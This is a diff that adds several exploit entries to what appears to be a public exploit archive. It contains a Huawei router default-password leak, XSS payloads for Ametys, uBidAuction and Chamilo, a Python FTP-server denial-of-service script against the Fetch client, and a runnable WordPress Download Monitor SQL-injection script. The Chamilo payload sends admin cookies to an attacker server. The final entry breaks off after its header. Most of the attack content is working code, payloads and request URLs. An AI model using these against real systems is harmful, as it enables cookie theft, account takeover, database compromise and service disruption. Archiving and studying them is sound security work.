diff --git a/exploits/hardware/webapps/50701.txt b/exploits/hardware/webapps/50701.txt
new file mode 100644
index 000000000..7cb8ae3a0
--- /dev/null
+++ b/exploits/hardware/webapps/50701.txt
@@ -0,0 +1,42 @@
+# Title: Huawei DG8045 Router 1.0 - Credential Disclosure
+# Date: 2020-06-24
+# Author: Abdalrahman Gamal
+# Vendor Homepage: www.huawei.com
+# Version: dg8045
+# HardwareVersion: VER.A
+# CVE: N/A
+
+#POC:
+
+The default password of this router is the last 8 characters of the
+device's serial number which exist in the back of the device.
+
+An attacker can leak the serial number via the web app API like the
+following:
+
+************************Request************************
+GET /api/system/deviceinfo HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
+Gecko/20100101 Firefox/65.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.1.1/
+X-Requested-With: XMLHttpRequest
+Connection: close
+
+
+************************Response************************
+HTTP/1.1 200 OK
+Cache-Control: no-cache, no-store, max-age=0, must-revalidate
+X-Download-Options: noopen
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+Date: Thu, 24 Jun 2021 02:07 GMT+2
+Connection: Keep-Alive
+Content-Language: en
+Content-Type: application/javascript
+Content-Length: 141
+
+while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/
\ No newline at end of file
diff --git a/exploits/java/webapps/50692.txt b/exploits/java/webapps/50692.txt
new file mode 100644
index 000000000..5e74c79f3
--- /dev/null
+++ b/exploits/java/webapps/50692.txt
@@ -0,0 +1,255 @@
+# Exploit Title: Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
+# Exploit Author: Vulnerability-Lab
+# Date: 21/01/2022
+
+
+Document Title:
+===============
+Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2275
+
+
+Release Date:
+=============
+2022-01-12
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2275
+
+
+Common Vulnerability Scoring System:
+====================================
+5.2
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professionnal blog or
+an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed.
+Ametys make it easy for everyone to create and manage unified digital platform. Ametys delivers simple and intuitive interface with
+a familiar ribbon Office style interface.
+
+(Copy of the Homepage:https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 cms web-application.
+
+
+Affected Product(s):
+====================
+Ametys
+Product: Ametys v4.4.1 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2021-07-24: Researcher Notification & Coordination (Security Researcher)
+2021-07-25: Vendor Notification (Security Department)
+2021-**-**: Vendor Response/Feedback (Security Department)
+2021-**-**: Vendor Fix/Patch (Service Developer Team)
+2021-**-**: Security Acknowledgements (Security Department)
+2022-01-12: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 cms web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The vulnerability is located in the input fields of the link text, small description and description in the add external link function.
+The function is for example located in the link directory of the backend. Added links are listed with status and details.
+Attackers with low privileges are able to add own malformed link with malicious script code in the marked vulnerable parameters.
+After the inject the links are being displayed in the backend were the execute takes place on preview of the main link directory.
+The attack vector of the vulnerability is persistent and the request method to inject is post.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Link Directory (Add)
+
+Vulnerable Function(s):
+[+] add (External Link)
+
+Vulnerable Parameter(s):
+[+] Link Text
+[+] Small description
+[+] Description
+
+Affected Module(s):
+[+] Frontend (Main Link Listing)
+[+] Backend (Link Directory)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attackers with low privilged user accounts with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the application path and login to the service as restricted user that allowed to create links
+2. Open the link directory and create a new link (top|left)
+3. Inject the test payloads to the link text, small description and description and save via post
+4. On visit of the link directory the payloads executes in the backend listing or frontend
+5. Successful reproduce of the persistent web vulnerability!
+
+
+Payload(s):
+<a onmouseover=alert(document.domain)>poc_link</a>
+<a onmouseover=alert(document.cookie)>poc_link</a>
+
+
+Vulnerable Source: Link Directory - Link (Add)
+class="x-grid-cell-inner " style="text-align:left;"
+<a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7478 x-unselectable"
+style="width: 248px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7478"><div unselectable="on" class="x-grid-cell-inner "
+style="text-align:left;"><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7479
+x-unselectable" style="width: 247px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7479"><div unselectable="on" class="x-grid-cell-inner "
+style="text-align:left;">&nbsp;</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7480 x-grid-cell-last x-unselectable" style="width:
+148px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7480"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">&nbsp;
+</div></td></tr></tbody></table><table id="tableview-7474-record-105" role="presentation" data-boundview="tableview-7474" data-recordid="105"
+data-recordindex="1" class="x-grid-item x-grid-item-selected x-grid-item-alt" style=";width:0" cellspacing="0" cellpadding="0"><tbody><tr class="
+x-grid-row" role="row"><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7475 x-grid-cell-first x-unselectable" style="width: 396px;"
+role="gridcell" tabindex="-1" data-columnid="gridcolumn-7475"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">
+<span class="a-grid-glyph ametysicon-link23"></span>test.de</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7476 x-unselectable"
+style="width: 149px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7476"><div unselectable="on" class="x-grid-cell-inner "
+style="text-align:left;">Normal</div></td>
+
+
+--- PoC Session Logs (POST) ---
+https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml
+Host: ametys.localhost:8000.localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: */*
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------1197812616356669894551519312
+Content-Length: 798
+Origin: https://ametys.localhost:8000.localhost:8000
+Connection: keep-alive
+Referer: https://ametys.localhost:8000.localhost:8000/cms/www/index.html
+Cookie: JSESSIONID=A1DC067A1739FDFBC72BCF921A5AA655;
+AmetysAuthentication=YW1ldHlzX2RlbW9fdXNlcnMjd2VibWFzdGVyI1A5WndHNTNzNmJhYlRWSDI;
+JSESSIONID=A0EC6E56FC3A2131C9D24C33CB9CCAAA
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+content={"0":{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-announcement/view.xml"},"1":
+{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-startuptime.xml"}}&context.parameters=
+{"siteName":"www","skin":"demo","debug.mode":"false","populationContexts":["/sites/www","/sites-fo/www"],"user":
+{"login":"testuser_restricted","population":"ametys_demo_users","firstname":"testuser_restricted","lastname":"User","fullname":"testuser_restricted User",
+"email":"testuser_restricted@test.com","populationLabel":"Ametys Demo Users","locale":"en"}}
+-
+POST: HTTP/1.1 200
+Server: Apache/2.4.29 (Ubuntu)
+X-Cocoon-Version: 2.1.13
+Ametys-Dispatched: true
+Content-Type: text/xml
+Via: 1.1 ametys.localhost:8000.localhost:8000
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Language: fr
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the input fields in the external link add function of the link directory.
+In a second step the input fields can be restricted for special chars to prevent further attacks.
+As next step the output location were the links are being displayed (frontend & backend) should to be sanitized correctly.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability in the ametys web-application cms is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/macos/local/50696.py b/exploits/macos/local/50696.py
new file mode 100755
index 000000000..352d85cb8
--- /dev/null
+++ b/exploits/macos/local/50696.py
@@ -0,0 +1,70 @@
+# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
+# Exploit Author: liquidworm
+
+#!/usr/bin/env python
+#
+#
+# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
+#
+#
+# Vendor: Fetch Softworks
+# Product web page: https://www.fetchsoftworks.com
+# Affected version: 5.8.2 (5K1354)
+#
+# Summary: Fetch is a reliable, full-featured file transfer client for the
+# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
+# Fetch supports FTP and SFTP, the most popular file transfer protocols on
+# the Internet for compatibility with thousands of Internet service providers,
+# web hosting companies, publishers, pre-press companies, and more.
+#
+# Desc: The application is prone to a DoS after receiving a long server response
+# (more than 2K bytes) leading to 100% CPU consumption.
+#
+# --------------------------------------------------------------------------------
+# ~/Desktop> ps ucp 3498
+# USER     PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
+# lqwrm   3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
+# ~/Desktop>
+# --------------------------------------------------------------------------------
+#
+# Tested on: macOS Monterey 12.2
+#            macOS Big Sur 11.6.2
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2022-5696
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
+#
+#
+# 27.01.2022
+#
+
+import socket
+
+host = '0.0.0.0'
+port = 21
+
+s = socket.socket()
+s.bind((host, port))
+s.listen(2)
+
+print('Ascolto su', host, 'porta', port, '...')
+
+consumptor  = '220\x20'
+consumptor += 'ftp.zeroscience.mk'
+consumptor += '\x00' * 0x101E
+consumptor += '\x0D\x0A'
+
+while True:
+    try:
+        c, a = s.accept()
+        print('Connessione da', a)
+        print('CPU 100%, Memory++')
+        c.send(bytes(consumptor, 'UTF-8'))
+        c.send(b'Thricer OK, p\'taah\x0A\x0D')
+        print(c.recv(17))
+    except:
+        break
\ No newline at end of file
diff --git a/exploits/php/webapps/50693.txt b/exploits/php/webapps/50693.txt
new file mode 100644
index 000000000..94736b00e
--- /dev/null
+++ b/exploits/php/webapps/50693.txt
@@ -0,0 +1,241 @@
+# Exploit Title: uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
+# Exploit Author: Vulnerability-Lab
+# Date: 21/01/2022
+
+
+Document Title:
+===============
+uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2289
+
+
+Release Date:
+=============
+2022-01-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2289
+
+
+Common Vulnerability Scoring System:
+====================================
+5.4
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Non Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+uBidAuction is a powerful, scalable & fully-featured classic and bid auction software that lets create the ultimate
+profitable online auctions website. It allows to manage entire online auction operation: create new auctions within
+seconds, view members auctions and use the auction extension settings tool.
+
+(Copy of the Homepage:https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uBidAuction v2.0.1 script web-application.
+
+
+Affected Product(s):
+====================
+ApPHP
+Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)
+Product: ApPHP MVC Framework v1.2.2 (Framework)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-09-01: Researcher Notification & Coordination (Security Researcher)
+2022-09-02: Vendor Notification (Security Department)
+2022-09-07: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2022-01-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Pre Auth (No Privileges or Session)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple non-persistent cross site web vulnerabilities has been discovered in the official uBidAuction v2.0.1 script web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
+to web-application requests from the client-side.
+
+The cross site web vulnerabilities are located in the `date_created`, `date_from`, `date_to` and `created_at` parameters of the `filter` web module.
+The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script
+code is GET and the attack vector of the vulnerability is non-persistent on client-side.
+
+Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
+to malicious source and non-persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] ./orders/myOrders
+[+] ./auctions/myAuctions/status/active
+[+] ./auctions/myAuctions/status/loose
+[+] ./posts/manage
+[+] ./news/manage
+[+] ./tickets/manage
+[+] ./auctions/manage
+[+] ./backend/mailingLog/manage
+
+Vulnerable Parameter(s):
+[+] date_created
+[+] date_from
+[+] date_to
+[+] created_at
+
+Affected Module(s):
+[+] Filter
+
+
+Proof of Concept (PoC):
+=======================
+The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
+For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Exploitation: Payload
+"><iframe+src%3Devil.source+onload</iframe>
+
+
+Exploitation: PoC (Role: Member)
+https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter
+https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source
+https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
+https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
+https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
+https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
+
+
+Exploitation: PoC (Role: Admin)
+https://bid-auction.localhost:8080/posts/manage?post_header=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
+https://bid-auction.localhost:8080/news/manage?news_header=1&created_at=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&but_filter=Filter
+https://bid-auction.localhost:8080/tickets/manage?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=1&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
+https://bid-auction.localhost:8080/tickets/manage/status/opened?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=0&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter
+https://bid-auction.localhost:8080/auctions/manage?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=1&category_id=4&status=0&but_filter=Filter
+https://bid-auction.localhost:8080/backend/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=%22%3E%3Ciframe+src%3Devil.source+onload&status=&but_filter=Filter
+
+
+Vulnerable Source: ./mailingLog
+<div class="content">
+<a href="posts/add" class="add-new">Add Post</a><div class="filtering-wrapper">
+<form id="frmFilterPosts" action="posts/manage" method="get">
+Post Header: <input id="post_header" style="width:100px;" maxlength="255" type="text" value="avd" name="post_header">
+Date Created: <input id="created_at" maxlength="255" style="width:80px;" type="text" value=""><iframe src="evil.source" onload="alert(document.cookie)">" name="created_at" /><div class="buttons-wrapper">
+<input name="" class="button white" onclick="jQuery(location).attr('href','https://bid-auction.localhost:8080/posts/manage');" type="button" value="Cancel" />
+<input name="but_filter" type="submit" value="Filter" />
+</div></form></div>
+
+
+--- PoC Session Logs (GET) ---
+https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source+onload&auction_type_id=1&category_id=1&status=&but_filter=Filter
+Host:www.bid-auction-script.com
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:https://bid-auction.localhost:8080/auctions/myAuctions
+Cookie: apphp_2j9tuqddrg=v1as9gj4qqhakbpgthnrs34np7
+-
+GET: HTTP/1.1 200 OK
+Server: Apache
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 4542
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+
+Reference(s):
+https://bid-auction.localhost:8080/posts/manage
+https://bid-auction.localhost:8080/orders/myOrders
+https://bid-auction.localhost:8080/backend/mailingLog/manage
+https://bid-auction.localhost:8080/auctions/myAuctions/status/loose
+https://bid-auction.localhost:8080/auctions/myAuctions/status/active
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be resolved by a filter or secure encode of the vulnerable date_created, date_from, date_to and created_at parameters.
+Disallow the usage of special chars in the affected parameters on get method requests.
+Sansitize the vulnerable output location to resolve the point of execution in the filter module.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY (VULNERABILITY LAB)
+RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
\ No newline at end of file
diff --git a/exploits/php/webapps/50694.txt b/exploits/php/webapps/50694.txt
new file mode 100644
index 000000000..e0b038485
--- /dev/null
+++ b/exploits/php/webapps/50694.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover
+# Date: July 21 2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://chamilo.org
+# Software Link: https://chamilo.org
+# Version:  Chamilo-lms-1.11.x
+# Tested on:  Chamilo-lms-1.11.x
+# CVE: CVE-2021-37391
+#Publication:
+https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
+
+
+Description:  A user without privileges in Chamilo LMS 1.11.x can send an
+invitation message to another user, e.g., the administrator, through
+main/social/search.php,
+main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on
+the administration side via a stored XSS vulnerability via social network
+the send invitation feature.  .
+CVE ID: CVE-2021-37391
+CVSS:  Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
+URL:
+https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
+
+Affected parameter: send private message - text field
+Payload:  <img src=x onerror=this.src='
+http://yourserver/?c='+document.cookie>
+
+
+Steps to reproduce:
+  1. Navigate to the social network menu
+  2. Select the victim profile
+  3. Add the payload on the text field
+  4. Submit the request and wait for the payload execution
+
+*Impact:* By using this vulnerability, an unprivileged user can steal
+cookies from an admin account or force the administrator to create an
+account with admin privileges with an HTTP 302 redirect.
+*Mitigation*: Update the Chamilo to the latest version.
+*Fix*:
+https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
+
+
+
+
+Com os meus melhores cumprimentos,
+--
+*Pedro Tavares*
+Founder and Editor-in-Chief at seguranca-informatica.pt
+Co-founder of CSIRT.UBI
+Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>
+
+
+
+seguranca-informatica.pt | @sirpedrotavares
+<https://twitter.com/sirpedrotavares> | 0xSI_f33d
+<https://feed.seguranca-informatica.pt/>
\ No newline at end of file
diff --git a/exploits/php/webapps/50695.py b/exploits/php/webapps/50695.py
new file mode 100755
index 000000000..91ec966ed
--- /dev/null
+++ b/exploits/php/webapps/50695.py
@@ -0,0 +1,88 @@
+# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
+# Date 28.01.2022
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://www.download-monitor.com/
+# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip
+# Version: < 4.4.5
+# Tested on: Ubuntu 20.04
+# CVE: CVE-2021-24786
+# CWE: CWE-89
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md
+
+'''
+Description:
+The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter
+before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue
+'''
+
+# Banner:
+banner = '''
+
+   ___         __    ____   ___ ____  _      ____  _  _ _____ ___   __
+  / __\/\   /\/__\  |___ \ / _ \___ \/ |    |___ \| || |___  ( _ ) / /_
+ / /   \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \
+/ /___  \ V //_|_____/ __/| |_| / __/| |_____/ __/|__   _/ /| (_) | (_) |
+\____/   \_/\__/    |_____|\___/_____|_|    |_____|  |_|/_/  \___/ \___/
+
+                                  [+] Download Monitor - SQL-Injection
+                                  [@] Developed by Ron Jost (Hacker5preme)
+'''
+print(banner)
+
+import argparse
+import requests
+from datetime import datetime
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+
+# Exploit (WORKS ONLY IF ONE LOG EXISTS)
+print('')
+print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
+print('')
+# Generate payload for SQL-Injection
+sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
+sql_injection_code = sql_injection_code.replace(' ', '+')
+exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
+exploit = session.get(exploitcode_url)
+print(exploit)
+print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
\ No newline at end of file
diff --git a/exploits/php/webapps/50697.txt b/exploits/php/webapps/50697.txt
new file mode 100644
index 000000000..7e846b040
--- /dev/null
+++ b/exploits/php/webapps/50697.txt
@@ -0,0 +1,24 @@
+# Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
+# Date: 30-10-2021
+# Exploit Author: Ceylan Bozogullarindan
+# Author Webpage: https://bozogullarindan.com
+# Vendor Homepage: https://domaincheckplugin.com/
+# Software Link: https://wordpress.org/plugins/domain-check/
+# Version: 1.0.16
+# Tested on: Linux
+# CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)
+
+
+# Description:
+
